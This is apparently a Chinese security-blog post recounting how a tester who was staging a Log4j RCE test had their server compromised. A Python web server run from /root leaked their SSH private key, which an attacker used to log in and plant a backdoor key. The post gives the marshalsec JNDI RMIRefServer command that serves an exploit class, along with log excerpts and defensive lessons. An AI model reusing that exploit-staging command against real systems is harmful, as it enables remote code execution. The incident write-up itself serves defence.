【网友投稿】安全人员也被黑了~

admin
admin
admin
138646
文章
114
评论
2025年2月12日14:33:03评论7 views字数 1596阅读5分19秒阅读模式
声明:请勿利用本公众号文章内的相关技术、工具从事非法测试,如因此造成一切不良后果与文章作者及本公众号无关!
先来插个广告,最近在写springboot靶场,欢迎体验和star:

仓库地址

https://github.com/bansh2eBreak/SpringVulnBoot-backend
【网友投稿】安全人员也被黑了~
【网友投稿】安全人员也被黑了~
【网友投稿】安全人员也被黑了~
0x01、引言
在网络安全领域,漏洞测试是每个安全人员的日常工作。然而,一个小小的疏忽,可能会带来灾难性的后果。今天,我想分享一个真实的案例——一次“无心之失”如何导致公网主机被完全控制,希望借此提醒大家:安全无小事,细节决定成败。
0x02、事件背景
作为一名安全人员,路人甲经常需要对系统进行漏洞测试。某天,路人甲想通过自己的公网主机测试Log4j RCE漏洞,所以他在自己的公网主机上启动一个 Python HTTP 和 marshalsec.jndi.RMIRefServer 服务,命令如下:
# 通过python启动简易webpython -m http.server 8088# 通过marshalsec启动RMIRefServerjava -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://x.x.x.x:8088/#evilcalc" 9999
因为测试比较着急,路人甲没有多想直接就在默认路径/root 下执行上述命令,结果/root 路径(包括/root/.ssh/等敏感路径)里面的文件全部暴露到互联网。
0x03、简单溯源
1、怎么发现的?在机器被恶意登录后,云平台安全中心发送了短信告警,如下:
【网友投稿】安全人员也被黑了~
【网友投稿】安全人员也被黑了~
2、立即上机器,查看登录日志如下
【网友投稿】安全人员也被黑了~
一开始,路人甲只注意到上图标红的部分:Failed password for root
Feb1115:10:26VM-0-12-centos sshd[23558]: Failed password for root from193.176.211.30 port 13191 ssh2
当时一度怀疑云平台的安全告警太拉了,但事实证明腾讯云还是不错的 
3、后来注意到下面的密钥登录:Accepted publickey for root
Feb1115:10:51VM-0-12-centos sshd[23693]: Accepted publickey for root from193.176.211.30 port 52508ssh2RSASHA256:TrwKr6CbW5a5XW9tVe4bX7WInL82j6n0yJ84726h76o
说明恶意IP 193.176.211.30 使用公钥成功登录主机,那就是私钥被泄漏了。
4、路人甲想了很久才知道,密钥应该是因为做安全实验,启用python简易web服务泄漏的,经过排查日志证实确实是这样:
【网友投稿】安全人员也被黑了~
确实可以看到,来自恶意IP 193.176.211.30 有下载过服务器的/.ssh/id_rsa 私钥文件。
顺便也看下恶意IP 193.176.211.30 的所有访问日志:
【网友投稿】安全人员也被黑了~
一个文件都不放过,盲猜是自动化扫描器的行为。
5、攻击者还在机器上留了个ssh密钥后门
【网友投稿】安全人员也被黑了~
6、最后进程、文件等等排查了,暂时没有发现异常,保险起见还是重置下系统吧

0x04、教训与反思

  • 最小权限原则:

    • 在测试时,尽量避免将敏感目录(如 /root)直接映射出去。可以使用一个临时目录,仅暴露必要的文件。

  • 限制访问范围:

    • 使用防火墙或安全组限制相关服务(http/ssh等)的访问 IP,仅允许可信 IP 访问。

  • 及时关闭测试服务:

    • 测试完成后,立即关闭 HTTP 服务器,避免长时间暴露在公网。

  • 监控与告警:

    • 部署主机入侵检测系统(如 OSSEC),实时监控异常登录和文件修改。

    • 设置告警规则,及时发现并响应安全事件。

再说一遍,安全无小事,细节决定成败。

原文始发于微信公众号(安全随笔):【网友投稿】安全人员也被黑了~

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年2月12日14:33:03
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【网友投稿】安全人员也被黑了~https://cn-sec.com/archives/3731250.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息